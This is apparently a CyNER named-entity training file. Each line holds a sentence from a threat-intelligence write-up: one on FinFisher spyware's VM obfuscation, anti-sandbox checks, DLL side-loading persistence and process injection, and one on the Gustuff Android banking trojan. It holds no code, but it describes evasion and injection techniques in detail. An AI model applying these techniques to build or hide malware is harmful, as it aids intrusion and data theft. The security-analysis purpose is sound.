{"text": "This data structure is 24 bytes and is composed of some fixed fields and a variable portion that depends on the opcode .", "spans": {}, "info": {"id": "cyner_train_000778", "source": "cyner_train"}}
{"text": "A graphical representation of the data structure used to store each VM opcode The VM handler is completely able to generate different code blocks and deal with relocated code due to address space layout randomization ( ASLR ) .", "spans": {}, "info": {"id": "cyner_train_000781", "source": "cyner_train"}}
{"text": "For instance , in the case of the “ Execute ” opcode ( 0x17 ) , the 32-bit code to run is stored entirely into the variable section with the value at offset 5 specifying the number of bytes to be copied and executed .", "spans": {}, "info": {"id": "cyner_train_000783", "source": "cyner_train"}}
{"text": "Of course , not all the opcodes are can be easily read and understood due to additional steps that the authors have taken to make analysis extremely complicated .", "spans": {}, "info": {"id": "cyner_train_000785", "source": "cyner_train"}}
{"text": "One of the obfuscation tricks included by the malware authors in a VM opcode dispatcher Even armed with the knowledge we have described so far , it still took us many hours to write a full-fledged opcode interpreter that ’ s able to reconstruct the real code executed by FinFisher .", "spans": {"MALWARE: FinFisher": [[271, 280]]}, "info": {"id": "cyner_train_000788", "source": "cyner_train"}}
{"text": "The loader first dynamically rebuilds a simple import address table ( IAT ) , resolving all the API needed from Kernel32 and NtDll libraries .", "spans": {}, "info": {"id": "cyner_train_000790", "source": "cyner_train"}}
{"text": "It eventually kills all threads that belong to these undesired modules ( using ZwQueryInformationThread native API with ThreadQuerySetWin32StartAddress information class ) .", "spans": {}, "info": {"id": "cyner_train_000792", "source": "cyner_train"}}
{"text": "The first anti-sandbox technique is the loader checking the code segment .", "spans": {}, "info": {"id": "cyner_train_000793", "source": "cyner_train"}}
{"text": "Next , the dropper checks its own parent process for indications that it is running in a sandbox setup .", "spans": {}, "info": {"id": "cyner_train_000795", "source": "cyner_train"}}
{"text": "It calculates the MD5 hash of the lower-case process image name and terminates if one of the following conditions are met : The MD5 hash of the parent process image name is either D0C4DBFA1F3962AED583F6FCE666F8BC or 3CE30F5FED4C67053379518EACFCF879 The parent process ’ s full image path is equal to its own process path If these initial checks are passed , the loader builds a complete IAT by reading four imported libraries from disk ( ntdll.dll", "spans": {}, "info": {"id": "cyner_train_000796", "source": "cyner_train"}}
{"text": ", kernel32.dll , advapi32.dll , and version.dll ) and remapping them in memory .", "spans": {}, "info": {"id": "cyner_train_000797", "source": "cyner_train"}}
{"text": "This technique makes use of debuggers and software breakpoints useless .", "spans": {}, "info": {"id": "cyner_train_000798", "source": "cyner_train"}}
{"text": "A lot of additional anti-sandbox checks are performed in this exact order : Check that the malware is not executed under the root folder of a drive Check that the malware file is readable from an external source Check that the hash of base path is not 3D6D62AF1A7C8053DBC8E110A530C679 Check that the full malware path contains only human readable characters ( “ a-z ” , “ A-Z ” , and “ 0-9 ” ) Check that no node in the full path contains the MD5 string of the malware", "spans": {}, "info": {"id": "cyner_train_000802", "source": "cyner_train"}}
{"text": "file Fingerprint the system and check the following registry values : HKLM\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid should not be “ 6ba1d002-21ed-4dbe-afb5-08cf8b81ca32 ” HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\DigitalProductId should not be “ 55274-649-6478953-23109 ” , “ A22-00001 ” , or “ 47220 ” HARDWARE\\Description\\System\\SystemBiosDate should not contain “ 01/02/03 ”", "spans": {}, "info": {"id": "cyner_train_000803", "source": "cyner_train"}}
{"text": "Check that the mutex WininetStartupMutex0 does not already exist Check that no DLL whose base name has hash value of 0xC9CEF3E4 is mapped into the malware address space The hashes in these checks are most likely correspond to sandbox or security products that the FinFisher authors want to avoid .", "spans": {"MALWARE: FinFisher": [[264, 273]]}, "info": {"id": "cyner_train_000804", "source": "cyner_train"}}
{"text": "For the hardware virtualization check , the loader obtains the hardware device list and checks if the MD5 of the vendor ID is equal to a predefined list .", "spans": {}, "info": {"id": "cyner_train_000806", "source": "cyner_train"}}
{"text": "In our tests , the malware sample was able to easily detect both VMWare and Hyper-V environments through the detection of the virtualized peripherals ( for example , Vmware has VEN_15AD as vendor ID , HyperV has VMBus as bus name ) .", "spans": {"SYSTEM: VMWare": [[65, 71]], "SYSTEM: Hyper-V": [[76, 83]], "ORGANIZATION: Vmware": [[166, 172]]}, "info": {"id": "cyner_train_000807", "source": "cyner_train"}}
{"text": "The loader ’ s anti-debugger code is based on the following three methods : The first call aims to destroy the debugger connection : NOTE : This call completely stops the execution of WinDbg and other debuggers The second call tries to detect the presence of a debugger : The final call tries to destroy the possibility of adding software breakpoint : Finally , if the loader is happy with all the checks done so far , based on the victim operating system ( 32 or 64-bit ) it proceeds to decrypt a set of fake bitmap resources ( stage 2", "spans": {}, "info": {"id": "cyner_train_000809", "source": "cyner_train"}}
{"text": ") embedded in the executable and prepares the execution of a new layer of VM decoding .", "spans": {}, "info": {"id": "cyner_train_000810", "source": "cyner_train"}}
{"text": "For the 64-bit stage 2 malware , the code execution is transferred from the loader using a well-known technique called Heaven ’ s Gate .", "spans": {}, "info": {"id": "cyner_train_000815", "source": "cyner_train"}}
{"text": "In the next sections , for simplicity , we will continue the analysis only on the 64-bit payload .", "spans": {}, "info": {"id": "cyner_train_000816", "source": "cyner_train"}}
{"text": "Heaven ’ s gate is still in use in 2017 Stage 2 : A second multi-platform virtual machine The 64-bit stage 2 malware implements another loader combined with another virtual machine .", "spans": {}, "info": {"id": "cyner_train_000818", "source": "cyner_train"}}
{"text": "The architecture is quite similar to the one described previously , but the opcodes are slightly different .", "spans": {}, "info": {"id": "cyner_train_000819", "source": "cyner_train"}}
{"text": "INDEX MNEMONIC DESCRIPTION 0x0 JMP Special obfuscated conditional Jump ( always taken or always ignored ) 0x1 JMP Jump to a function ( same as opcode 0x10 ) 0x2 CALL Call to the function pointed by the internal VM value 0x3 CALL Optimized CALL function ( like the 0x1E opcode of the 32-bit VM ) 0x4 EXEC Execute code and move to the next packet 0x5 JMP Jump to an internal function 0x6 NOP No operation , move to the", "spans": {}, "info": {"id": "cyner_train_000821", "source": "cyner_train"}}
{"text": "next packet 0x7 CALL Call an imported API ( whose address is stored in the internal VM value ) 0x8 LOAD Load a value into the VM descriptor structure * 0x9 STORE Store the internal VM value inside a register 0xA WRITE Resolve a pointer and store the value of a register in its content 0xB READ Move the value pointed by the VM internal value into a register 0xC LOAD Load a value into the VM descriptor structure ( not optimized ) 0xD CMP Compare the value pointed by the internal VM descriptor", "spans": {}, "info": {"id": "cyner_train_000822", "source": "cyner_train"}}
{"text": "with a register 0xE CMP Compare the value pointed by the internal VM descriptor with an immediate value 0xF XCHG Exchange the value pointed by the internal VM descriptor with a register 0x10 SHL Jump to a function ( same as opcode 0x1 ) This additional virtual machine performs the same duties as the one already described but in a 64-bit environment .", "spans": {}, "info": {"id": "cyner_train_000823", "source": "cyner_train"}}
{"text": "The extraction method is the same , but the encryption algorithm ( also XOR ) is much simpler .", "spans": {}, "info": {"id": "cyner_train_000825", "source": "cyner_train"}}
{"text": "The new payload is decrypted , remapped , and executed in memory , and represents the installation and persistence stage of the malware .", "spans": {}, "info": {"id": "cyner_train_000826", "source": "cyner_train"}}
{"text": "It is the first plain stage that does not employ a VM or obfuscation .", "spans": {}, "info": {"id": "cyner_train_000828", "source": "cyner_train"}}
{"text": "The code supports two different installation methods : setup in a UAC-enforced environment ( with limited privileges ) , or an installation with full-administrative privileges enabled ( in cases where the malware gains the ability to run with elevated permissions ) .", "spans": {"SYSTEM: UAC-enforced environment": [[66, 90]]}, "info": {"id": "cyner_train_000829", "source": "cyner_train"}}
{"text": "We were a bit disappointed that we did not see traces of a true privilege escalation exploit after all this deobfuscation work , but it seems these FinFisher samples were designed to work just using UAC bypasses .", "spans": {"VULNERABILITY: privilege escalation exploit": [[64, 92]], "MALWARE: FinFisher": [[148, 157]]}, "info": {"id": "cyner_train_000830", "source": "cyner_train"}}
{"text": "The setup code receives an installation command from the previous stage .", "spans": {}, "info": {"id": "cyner_train_000831", "source": "cyner_train"}}
{"text": "The malware creates a global event named 0x0A7F1FFAB12BB2 and drops some files under a folder located in C : \\ProgramData or in the user application data folder .", "spans": {}, "info": {"id": "cyner_train_000833", "source": "cyner_train"}}
{"text": "The name of the folder and the malware configuration are read from a customized configuration file stored in the resource section of the setup program .", "spans": {}, "info": {"id": "cyner_train_000834", "source": "cyner_train"}}
{"text": "Here the list of the files potentially dropped during the installation stage : FILE NAME STAGE DESCRIPTION d3d9.dll Stage 4 Malware loader used for UAC environments with limited privileges ; also protected by VM obfuscation aepic.dll , sspisrv.dll , userenv.dll Stage 4 Malware loader used in presence of administrative privileges ; executed from ( and injected into ) a fake service ; also protected by VM obfuscation msvcr90.dll Stage 5 Malware payload injected into", "spans": {}, "info": {"id": "cyner_train_000835", "source": "cyner_train"}}
{"text": "the explorer.exe or winlogon.exe process ; also protected by VM obfuscation .cab Config Main configuration file ; encrypted setup.cab Unknown Last section of the setup executable ; content still unknown .7z Plugin Malware plugin used to spy the victim network communications wsecedit.rar Stage 6 Main malware executable After writing some of these files , the malware decides which kind of installation to perform based on the current privilege provided by the hosting process ( for example , if a Microsoft Office process was used as exploit vector ) : Installation process under", "spans": {"SYSTEM: Microsoft Office": [[498, 514]]}, "info": {"id": "cyner_train_000836", "source": "cyner_train"}}
{"text": "UAC When running under a limited UAC account , the installer extracts d3d9.dll and creates a persistence key under HKCU\\Software\\Microsoft\\Windows\\Run .", "spans": {}, "info": {"id": "cyner_train_000837", "source": "cyner_train"}}
{"text": "The malware sets a registry value ( whose name is read from the configuration file ) to “ C : \\Windows\\system32\\rundll32.exe c : \\ProgramData\\AuditApp\\d3d9.dll , Control_Run ” .", "spans": {}, "info": {"id": "cyner_train_000838", "source": "cyner_train"}}
{"text": "Before doing this , the malware makes a screenshot of the screen and displays it on top of all other windows for few seconds .", "spans": {"SYSTEM: windows": [[101, 108]]}, "info": {"id": "cyner_train_000839", "source": "cyner_train"}}
{"text": "In this case the persistence is achieved by loading the original explorer.exe from its startup location and , using DLL side-loading , passing the execution control to the stage 4 malware ( discussed in next section ) .", "spans": {}, "info": {"id": "cyner_train_000842", "source": "cyner_train"}}
{"text": "Finally , the malware spawns a thread that has the goal to load , remap , and relocate the stage 5 malware .", "spans": {}, "info": {"id": "cyner_train_000843", "source": "cyner_train"}}
{"text": "The msvcr90.dll file is opened , read , and decrypted , and the code execution control is transferred to the RunDll exported routine .", "spans": {}, "info": {"id": "cyner_train_000845", "source": "cyner_train"}}
{"text": "The method is a well-known trick used by penetration testers that was automated and generalized by FinFisher The procedure starts by enumerating the KnownDlls object directory and then scanning for section objects of the cached system DLLs .", "spans": {"MALWARE: FinFisher": [[99, 108]]}, "info": {"id": "cyner_train_000848", "source": "cyner_train"}}
{"text": "Next , the malware enumerates all .exe programs in the % System % folder and looks for an original signed Windows binary that imports from at least one KnownDll and from a library that is not in the KnownDll directory .", "spans": {"SYSTEM: Windows": [[106, 113]]}, "info": {"id": "cyner_train_000849", "source": "cyner_train"}}
{"text": "When a suitable .exe file candidate is found , it is copied into the malware installation folder ( for example , C : \\ProgramData ) .", "spans": {}, "info": {"id": "cyner_train_000850", "source": "cyner_train"}}
{"text": "It then calls a routine that adds a code section to a target module .", "spans": {}, "info": {"id": "cyner_train_000852", "source": "cyner_train"}}
{"text": "At the time of writing , the dropper supports aepic.dll , sspisrv.dll , ftllib.dll , and userenv.dll to host the malicious FinFisher payload .", "spans": {"MALWARE: FinFisher": [[123, 132]]}, "info": {"id": "cyner_train_000854", "source": "cyner_train"}}
{"text": "Finally , a new Windows service is created with the service path pointing to the candidate .exe located in this new directory together with the freshly created , benign-looking DLL .", "spans": {"SYSTEM: Windows": [[16, 23]]}, "info": {"id": "cyner_train_000855", "source": "cyner_train"}}
{"text": "In this way , when the service runs during boot , the original Windows executable is executed from a different location and it will automatically load and map the malicious DLL inside its address space , instead of using the genuine system library .", "spans": {"SYSTEM: Windows": [[63, 70]]}, "info": {"id": "cyner_train_000856", "source": "cyner_train"}}
{"text": "This routine is a form of generic and variable generator of DLL side-loading combinations .", "spans": {}, "info": {"id": "cyner_train_000857", "source": "cyner_train"}}
{"text": "Windows Defender ATP timeline can pinpoint the service DLL side-loading trick ( in this example , using fltlib.dll ) .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20]]}, "info": {"id": "cyner_train_000859", "source": "cyner_train"}}
{"text": "In the past , we have seen other activity groups like LEAD employ a similar attacker technique named “ proxy-library ” to achieve persistence , but not with this professionalism .", "spans": {}, "info": {"id": "cyner_train_000860", "source": "cyner_train"}}
{"text": "The DLL side-loaded stage 4 malware mimicking a real export table to avoid detection Stage 4 : The memory loader – Fun injection with GDI function hijacking Depending on how stage 4 was launched , two different things may happen : In the low-integrity case ( under UAC ) the installer simply injects the stage 5 malware into the bogus explorer.exe process started earlier and terminates In the high-integrity case ( with administrative privileges or after UAC bypass ) , the code searches for the process hosting the Plug and Play service ( usually svchost.exe", "spans": {}, "info": {"id": "cyner_train_000864", "source": "cyner_train"}}
{"text": ") loaded in memory and injects itself into it For the second scenario , the injection process works like this : The malware opens the target service process .", "spans": {}, "info": {"id": "cyner_train_000865", "source": "cyner_train"}}
{"text": "It allocates and fills four chunks of memory inside the service process .", "spans": {}, "info": {"id": "cyner_train_000866", "source": "cyner_train"}}
{"text": "One chunk contains the entire malware DLL code ( without PE headers ) .", "spans": {}, "info": {"id": "cyner_train_000867", "source": "cyner_train"}}
{"text": "Another chunk is used to copy a basic Ntdll and Kernel32 import address table .", "spans": {}, "info": {"id": "cyner_train_000868", "source": "cyner_train"}}
{"text": "Two chunks are filled with an asynchronous procedure call ( APC ) routine code and a stub .", "spans": {}, "info": {"id": "cyner_train_000869", "source": "cyner_train"}}
{"text": "It opens the service thread of the service process and uses the ZwQueueApcThread native API to inject an APC .", "spans": {}, "info": {"id": "cyner_train_000870", "source": "cyner_train"}}
{"text": "The APC routine creates a thread in the context of the svchost.exe process that will map and execute the stage 5 malware into the winlogon.exe process .", "spans": {}, "info": {"id": "cyner_train_000871", "source": "cyner_train"}}
{"text": "The injection method used for winlogon.exe is also interesting and quite unusual .", "spans": {}, "info": {"id": "cyner_train_000872", "source": "cyner_train"}}
{"text": "We believe that this method is engineered to avoid trivial detection of process injection using the well-detected CreateRemoteThread or ZwQueueApcThread API .", "spans": {}, "info": {"id": "cyner_train_000873", "source": "cyner_train"}}
{"text": "The malware takes these steps : Check if the system master boot record ( MBR ) contains an infection marker ( 0xD289C989C089 8-bytes value at offset 0x2C ) , and , if so , terminate itself Check again if the process is attached to a debugger ( using the techniques described previously ) Read , decrypt , and map the stage 5 malware ( written in the previous stage in msvcr90.dll ) Open winlogon.exe process Load user32.dll system library and read the KernelCallbackTable", "spans": {}, "info": {"id": "cyner_train_000874", "source": "cyner_train"}}
{"text": "pointer from its own process environment block ( PEB ) ( Note : The KernelCallbackTable points to an array of graphic functions used by Win32 kernel subsystem module win32k.sys as call-back into user-mode .", "spans": {}, "info": {"id": "cyner_train_000875", "source": "cyner_train"}}
{"text": ") Calculate the difference between this pointer and the User32 base address .", "spans": {}, "info": {"id": "cyner_train_000876", "source": "cyner_train"}}
{"text": "Copy the stage 5 DLL into winlogon.exe Allocate a chunk of memory in winlogon.exe process and copy the same APC routine seen previously Read and save the original pointer of the __fnDWORD internal User32 routine ( located at offset +0x10 of the KernelCallbackTable ) and replace this pointer with the address of the APC stub routine After this function pointer hijacking , when winlogon.exe makes any graphical call ( GDI ) , the malicious code can execute without using CreateRemoteThread or", "spans": {}, "info": {"id": "cyner_train_000877", "source": "cyner_train"}}
{"text": "similar triggers that are easily detectable .", "spans": {}, "info": {"id": "cyner_train_000878", "source": "cyner_train"}}
{"text": "After execution it takes care of restoring the original KernelCallbackTable .", "spans": {}, "info": {"id": "cyner_train_000879", "source": "cyner_train"}}
{"text": "Stage 5 : The final loader takes control The stage 5 malware is needed only to provide one more layer of obfuscation , through the VM , of the final malware payload and to set up a special Structured Exception Hander routine , which is inserted as Wow64PrepareForException in Ntdll .", "spans": {}, "info": {"id": "cyner_train_000880", "source": "cyner_train"}}
{"text": "This special exception handler is needed to manage some memory buffers protection and special exceptions that are used to provide more stealthy execution .", "spans": {}, "info": {"id": "cyner_train_000881", "source": "cyner_train"}}
{"text": "After the VM code has checked again the user environment , it proceeds to extract and execute the final un-obfuscated payload sample directly into winlogon.exe ( alternatively , into explorer.exe ) process .", "spans": {}, "info": {"id": "cyner_train_000882", "source": "cyner_train"}}
{"text": "The latter implements the entire spyware program .", "spans": {}, "info": {"id": "cyner_train_000884", "source": "cyner_train"}}
{"text": "Stage 6 : The payload is a modular spyware framework for further analysis Our journey to deobfuscating FinFisher has allowed us to uncover the complex anti-analysis techniques used by this malware , as well as to use this intel to protect our customers , which is our top priority .", "spans": {"MALWARE: FinFisher": [[103, 112]]}, "info": {"id": "cyner_train_000885", "source": "cyner_train"}}
{"text": "Analysis of the additional spyware modules is future work .", "spans": {}, "info": {"id": "cyner_train_000886", "source": "cyner_train"}}
{"text": "It is evident that the ultimate goal of this program is to steal information .", "spans": {}, "info": {"id": "cyner_train_000887", "source": "cyner_train"}}
{"text": "The plugins are stored in its resource section and can be protected by the same VM .", "spans": {}, "info": {"id": "cyner_train_000889", "source": "cyner_train"}}
{"text": "The sample we analyzed in October , for example , contains a plugin that is able to spy on internet connections , and can even divert some SSL connections and steal data from encrypted traffic .", "spans": {}, "info": {"id": "cyner_train_000890", "source": "cyner_train"}}
{"text": "Describing this additional piece of code in detail is outside the scope of this analysis and may require a new dedicated blog post .", "spans": {"SYSTEM: scope": [[66, 71]]}, "info": {"id": "cyner_train_000893", "source": "cyner_train"}}
{"text": "Windows 10 S devices are naturally protected against FinFisher and other threats thanks to the strong code integrity policies that don ’ t allow unknown unsigned binaries to run ( thus stopping FinFisher ’ s PE installer ) or loaded ( blocking FinFisher ’ s DLL persistence ) .", "spans": {"SYSTEM: Windows 10": [[0, 10]], "MALWARE: FinFisher": [[53, 62], [194, 203], [244, 253]]}, "info": {"id": "cyner_train_000895", "source": "cyner_train"}}
{"text": "Office 365 ATP blocks unsafe attachments , malicious links , and linked-to files using time-of-click protection .", "spans": {"SYSTEM: Office 365 ATP": [[0, 14]]}, "info": {"id": "cyner_train_000898", "source": "cyner_train"}}
{"text": "Using intel from this research , we have made Office 365 ATP more resistant to FinFisher ’ s anti-sandbox checks .", "spans": {"SYSTEM: Office 365 ATP": [[46, 60]], "MALWARE: FinFisher": [[79, 88]]}, "info": {"id": "cyner_train_000899", "source": "cyner_train"}}
{"text": "Generic detections , advanced behavioral analytics , and machine learning technologies in Windows Defender Advanced Threat Protection detect FinFisher ’ s malicious behavior throughout the attack kill chain and alert SecOps personnel .", "spans": {"SYSTEM: Windows Defender Advanced Threat Protection": [[90, 133]], "MALWARE: FinFisher": [[141, 150]]}, "info": {"id": "cyner_train_000900", "source": "cyner_train"}}
{"text": "Windows Defender ATP also integrates with the Windows protection stack so that protections from Windows Defender AV and Windows Defender Exploit Guard are reported in Windows Defender ATP portal , enabling SecOps personnel to centrally manage security , and as well as promptly investigate and respond to hostile activity in the network .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20], [167, 187]], "SYSTEM: Windows": [[46, 53]], "SYSTEM: Windows Defender AV": [[96, 115]], "SYSTEM: Windows Defender Exploit Guard": [[120, 150]]}, "info": {"id": "cyner_train_000901", "source": "cyner_train"}}
{"text": "We hope that this writeup of our journey through all the multiple layers of protection , obfuscation , and anti-analysis techniques of FinFisher will be useful to other researchers studying this malware .", "spans": {"MALWARE: FinFisher": [[135, 144]]}, "info": {"id": "cyner_train_000902", "source": "cyner_train"}}
{"text": "We believe that an industry-wide collaboration and information-sharing is important in defending customers against this complex piece of malware .", "spans": {}, "info": {"id": "cyner_train_000903", "source": "cyner_train"}}
{"text": "TUESDAY , APRIL 9 , 2019 Gustuff banking botnet targets Australia EXECUTIVE SUMMARY Cisco Talos has uncovered a new Android-based campaign targeting Australian financial institutions .", "spans": {"MALWARE: Gustuff": [[25, 32]], "ORGANIZATION: Cisco Talos": [[84, 95]], "SYSTEM: Android-based": [[116, 129]]}, "info": {"id": "cyner_train_000904", "source": "cyner_train"}}
{"text": "Although this malware 's credential-harvest mechanism is not particularly sophisticated , it does have an advanced self-preservation mechanism .", "spans": {}, "info": {"id": "cyner_train_000906", "source": "cyner_train"}}
{"text": "Aside from the credential stealing , this malware also includes features like the theft of users ' contact list , collecting phone numbers associated names , and files and photos on the device .", "spans": {}, "info": {"id": "cyner_train_000908", "source": "cyner_train"}}
{"text": "But that does n't mean companies and organizations are out of the woods .", "spans": {}, "info": {"id": "cyner_train_000909", "source": "cyner_train"}}
{"text": "They should still be on the lookout for these kinds of trojans , as the attackers could target corporate accounts that contain large amounts of money .", "spans": {}, "info": {"id": "cyner_train_000910", "source": "cyner_train"}}
{"text": "A motivated attacker can use this trojan to harvest usernames and passwords and then reuse them to login into the organization 's system where the victim works .", "spans": {}, "info": {"id": "cyner_train_000912", "source": "cyner_train"}}
{"text": "Corporations can protect themselves from these side-channel attacks by deploying client-based two-factor authentication , such as Duo Security .", "spans": {"SYSTEM: Duo Security": [[130, 142]]}, "info": {"id": "cyner_train_000914", "source": "cyner_train"}}
{"text": "One of the most impressive features of this malware is its resilience .", "spans": {}, "info": {"id": "cyner_train_000915", "source": "cyner_train"}}
{"text": "If the command and control ( C2 ) server is taken down , the malicious operator can still recover the malware control by sending SMS messages directly to the infected devices .", "spans": {}, "info": {"id": "cyner_train_000916", "source": "cyner_train"}}
{"text": "This makes the taking down and recovery of the network much harder and poses a considerable challenge for defenders .", "spans": {}, "info": {"id": "cyner_train_000917", "source": "cyner_train"}}
{"text": "THE CAMPAIGN The malware 's primary infection vector is SMS .", "spans": {}, "info": {"id": "cyner_train_000918", "source": "cyner_train"}}
{"text": "Just like the old-school mail worms that used the victim 's address book to select the next victims , this banking trojan 's activation cycle includes the exfiltration of the victim 's address book .", "spans": {"SYSTEM: address book": [[60, 72]]}, "info": {"id": "cyner_train_000919", "source": "cyner_train"}}
{"text": "The trojan will receive instructions from the C2 to spread .", "spans": {}, "info": {"id": "cyner_train_000920", "source": "cyner_train"}}
{"text": "Usually , this message targets four or five people at a time .", "spans": {}, "info": {"id": "cyner_train_000922", "source": "cyner_train"}}
{"text": "The body contains a message and URL .", "spans": {}, "info": {"id": "cyner_train_000923", "source": "cyner_train"}}
{"text": "Again , the concept is that new victims are more likely to install the malware if the SMS comes from someone they know .", "spans": {}, "info": {"id": "cyner_train_000924", "source": "cyner_train"}}
{"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) .", "spans": {}, "info": {"id": "cyner_train_000925", "source": "cyner_train"}}
{"text": "However , Talos has identified that was used at least since November 2018 .", "spans": {"ORGANIZATION: Talos": [[10, 15]]}, "info": {"id": "cyner_train_000928", "source": "cyner_train"}}
{"text": "During the investigation , Talos was also able to determine that the same infrastructure has been used to deploy similar campaigns using different versions of the malware .", "spans": {"ORGANIZATION: Talos": [[27, 32]]}, "info": {"id": "cyner_train_000929", "source": "cyner_train"}}
{"text": "Distribution of victims .", "spans": {}, "info": {"id": "cyner_train_000930", "source": "cyner_train"}}
{"text": "Talos assess with high confidence that this campaign is targeting Australian financial institutions based on several factors .", "spans": {"ORGANIZATION: Talos": [[0, 5]]}, "info": {"id": "cyner_train_000931", "source": "cyner_train"}}
{"text": "Our Umbrella telemetry shows that the majority of the request comes from Australia and the majority of the phone numbers infected have the international indicative for Australia .", "spans": {}, "info": {"id": "cyner_train_000932", "source": "cyner_train"}}
{"text": "Finally , the specific overlays are designed for Australian financial institutions , and Australia is one of the geographic regions that is accepted by the C2 .", "spans": {}, "info": {"id": "cyner_train_000933", "source": "cyner_train"}}
{"text": "Our data shows , on average , about three requests per hour to the drop host .", "spans": {}, "info": {"id": "cyner_train_000935", "source": "cyner_train"}}
{"text": "This data , when analyzed with the number of commands to send SMSs that Talos received during the investigation , lead us to conclude that the malicious operator is aggressively spreading the malware , but that does n't seem to result in the same number of new infections .", "spans": {}, "info": {"id": "cyner_train_000937", "source": "cyner_train"}}
{"text": "While doing our investigation we were able to identify other malware packages with different names .", "spans": {}, "info": {"id": "cyner_train_000939", "source": "cyner_train"}}
{"text": "Some of these might have been used on old campaigns or were already prepared for new campaigns .", "spans": {}, "info": {"id": "cyner_train_000940", "source": "cyner_train"}}
{"text": "MALWARE TECHNICAL DETAILS During our investigation , researchers uncovered a malware known as \" Gustuff. '' .", "spans": {"MALWARE: Gustuff.": [[96, 104]]}, "info": {"id": "cyner_train_000941", "source": "cyner_train"}}
{"text": "Given the lack of indicators of compromise , we decided to check to see if this was the same malware we had been researching .", "spans": {}, "info": {"id": "cyner_train_000942", "source": "cyner_train"}}
{"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit.in forum as a botnet for rent .", "spans": {"MALWARE: Gustuff": [[56, 63]]}, "info": {"id": "cyner_train_000943", "source": "cyner_train"}}
{"text": "The seller , known as \" bestoffer , '' was , at some point , expelled from the forum .", "spans": {}, "info": {"id": "cyner_train_000944", "source": "cyner_train"}}
{"text": "Gustuff advertising screenshot The companies advertised in the image above were from Australia , which matches up with the campaign we researched .", "spans": {"MALWARE: Gustuff": [[0, 7]]}, "info": {"id": "cyner_train_000945", "source": "cyner_train"}}
{"text": "The screenshots provided by the author align with the advertised features and the features that we discovered while doing our analysis .", "spans": {}, "info": {"id": "cyner_train_000946", "source": "cyner_train"}}
{"text": "Admin panel The administration panel shows the application configuration , which matches the commands from the C2 .", "spans": {}, "info": {"id": "cyner_train_000947", "source": "cyner_train"}}
{"text": "Country selection The administration console screenshots also show the ability to filter the results by country .", "spans": {}, "info": {"id": "cyner_train_000948", "source": "cyner_train"}}
{"text": "In this case , \" AU '' is the code shown , which is Australia .", "spans": {}, "info": {"id": "cyner_train_000949", "source": "cyner_train"}}
{"text": "Design In the manifest , the malware requests a large number of permissions .", "spans": {}, "info": {"id": "cyner_train_000951", "source": "cyner_train"}}
{"text": "However , it does n't request permissions like BIND_ADMIN .", "spans": {}, "info": {"id": "cyner_train_000952", "source": "cyner_train"}}
{"text": "Permissions in the manifest This malware is designed to avoid detection and analysis .", "spans": {}, "info": {"id": "cyner_train_000954", "source": "cyner_train"}}
{"text": "The code is not only obfuscated but also packed .", "spans": {}, "info": {"id": "cyner_train_000956", "source": "cyner_train"}}
{"text": "The packer , besides making the static analysis more complex , will break the standard debugger .", "spans": {}, "info": {"id": "cyner_train_000957", "source": "cyner_train"}}
{"text": "Manifest activity declaration Class list inside the dex file The main malware classes are packed , to a point where the class defined in the manifest has a handler for the MAIN category that does not exist in the DEX file .", "spans": {}, "info": {"id": "cyner_train_000958", "source": "cyner_train"}}
{"text": "Error when trying to debug the malware using the Android Studio IDE .", "spans": {"SYSTEM: Android Studio IDE": [[49, 67]]}, "info": {"id": "cyner_train_000959", "source": "cyner_train"}}
{"text": "One of the side effects of this packer is the inability of Android Studio IDE to debug the code .", "spans": {"SYSTEM: Android Studio IDE": [[59, 77]]}, "info": {"id": "cyner_train_000960", "source": "cyner_train"}}
{"text": "Since the class does not exist at startup , the application does not run on the debugger .", "spans": {}, "info": {"id": "cyner_train_000962", "source": "cyner_train"}}
{"text": "Check code for emulators As part of its defense , the malware payload first checks for emulators to prevent analysis on sandboxes .", "spans": {}, "info": {"id": "cyner_train_000964", "source": "cyner_train"}}
{"text": "It checks for different kinds of emulators , including QEMU , Genymotion , BlueStacks and Bignox .", "spans": {"SYSTEM: QEMU": [[55, 59]], "SYSTEM: Genymotion": [[62, 72]], "SYSTEM: BlueStacks": [[75, 85]], "SYSTEM: Bignox": [[90, 96]]}, "info": {"id": "cyner_train_000965", "source": "cyner_train"}}
{"text": "If the malware determines that is not running on an emulator , it then performs additional checks to ensure that it wo n't be detected .", "spans": {}, "info": {"id": "cyner_train_000966", "source": "cyner_train"}}
{"text": "Code to check the existence of SafetyNet Google API It also checks if the Android SafetyNet is active and reporting back to the C2 .", "spans": {"SYSTEM: Google API": [[41, 51]], "SYSTEM: Android": [[74, 81]]}, "info": {"id": "cyner_train_000967", "source": "cyner_train"}}
{"text": "This helps the C2 define what actions it can do before being detected on the mobile device .", "spans": {}, "info": {"id": "cyner_train_000968", "source": "cyner_train"}}
{"text": "The trojan uses the Android Accessibility API to intercept all interactions between the user and the mobile device .", "spans": {"SYSTEM: Android Accessibility": [[20, 41]]}, "info": {"id": "cyner_train_000970", "source": "cyner_train"}}
{"text": "For example , when a button is clicked , a view is focused , etc .", "spans": {}, "info": {"id": "cyner_train_000972", "source": "cyner_train"}}
{"text": "'' For each interaction , the malware will check if the generator is a package that belongs to the anti-virus list , the malware will abuse another feature of the Accessibility API .", "spans": {"SYSTEM: Accessibility API": [[163, 180]]}, "info": {"id": "cyner_train_000973", "source": "cyner_train"}}
{"text": "There is a function called \" performGlobalAction '' with the description below .", "spans": {}, "info": {"id": "cyner_train_000974", "source": "cyner_train"}}
{"text": "Android documentation describes that function as \" a global action .", "spans": {"SYSTEM: Android": [[0, 7]]}, "info": {"id": "cyner_train_000975", "source": "cyner_train"}}
{"text": "For example , going back , going home , opening recents , etc .", "spans": {}, "info": {"id": "cyner_train_000977", "source": "cyner_train"}}
{"text": "'' The trojan calls this function with the action GLOBAL_ACTION_BACK , which equals the pressing of the back button on the device , thus canceling the opening of the anti-virus application .", "spans": {}, "info": {"id": "cyner_train_000978", "source": "cyner_train"}}
{"text": "The same event interception is used to place the webview overlay when the user tries to access the targeted applications , allowing it to display its overlay , thus intercepting the credentials .", "spans": {}, "info": {"id": "cyner_train_000979", "source": "cyner_train"}}
{"text": "The beaconing only starts after the application is installed and removed from the running tasks .", "spans": {}, "info": {"id": "cyner_train_000980", "source": "cyner_train"}}
